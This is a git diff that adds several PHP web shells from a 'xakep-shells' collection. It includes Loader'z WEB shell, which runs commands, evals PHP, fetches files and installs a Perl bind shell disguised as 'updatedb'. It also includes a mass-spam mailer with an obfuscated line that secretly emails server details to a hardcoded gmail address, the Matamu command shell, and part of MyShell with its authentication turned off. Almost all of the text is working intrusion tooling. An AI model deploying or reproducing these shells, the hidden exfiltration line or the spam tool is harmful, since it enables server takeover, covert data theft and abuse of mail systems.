+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïðåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/xakep-shells/PHP/mailer3.php.php.txt b/xakep-shells/PHP/mailer3.php.php.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/xakep-shells/PHP/mailer3.php.php.txt
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/xakep-shells/PHP/matamu.php.txt b/xakep-shells/PHP/matamu.php.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/xakep-shells/PHP/matamu.php.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/xakep-shells/PHP/myshell.php.php.txt b/xakep-shells/PHP/myshell.php.php.txt
new file mode 100644
index 0000000..69d8801
--- /dev/null
+++ b/xakep-shells/PHP/myshell.php.php.txt
@@ -0,0 +1,420 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+#$selfSecure enables built-in authenticate feature. This must be 0 in order to
+#use .htaccess file or other alternative method to control access to MyShell.
+#Set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 0;
+$shellUser  = "";
+$shellPswd  = "";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "******@mail.ru";
+
+#$fromEmail is the email address warning messages are sended from.
+#This defaults to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change when using cd command
+#or the form selector. Any attempt to change to a directory up to this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permission,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command a second time in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select either to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#$voidCommands is the list of commands that MyShell won't run by any means.
+#It defaults to known problematic commands from a web interface like pico,
+#top, xterm but also it can include specific commands you don't want to
+#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
+
+$voidCommands  = array("top","xterm","su","vi","pico","netscape");
+
+#$TexEd Built-in Text Editor prefered name. This is the command you'll use
+#to invoke MyShell's built in text editor.
+# If you are used to type pico or vi for your fav text editor,
+#change this to your please. i.e.:
+#  $TexEd = "pico";
+#will allow you to type 'pico config.php' to edit the file config.php
+#MyShell's text editor do not support usual commands in pico, vi etc.
+#Don't forget to take off this command from the $voidCommands list
+$TexEd  = "edit";
+
+#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
+#is usefull when you have to edit files with long lines, i.e.: in php code
+#files, because otherwise it is no easy to distinguish a real new line (CR)
+#from a wraped one. If you prefer to stick to the default wraped mode of
+#TEXTAREA just leave this blank i.e.: $editWrap="".
+$editWrap ="wrap='OFF'";
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.1.0 build 20010923";
+if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>$MyShellVersion - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
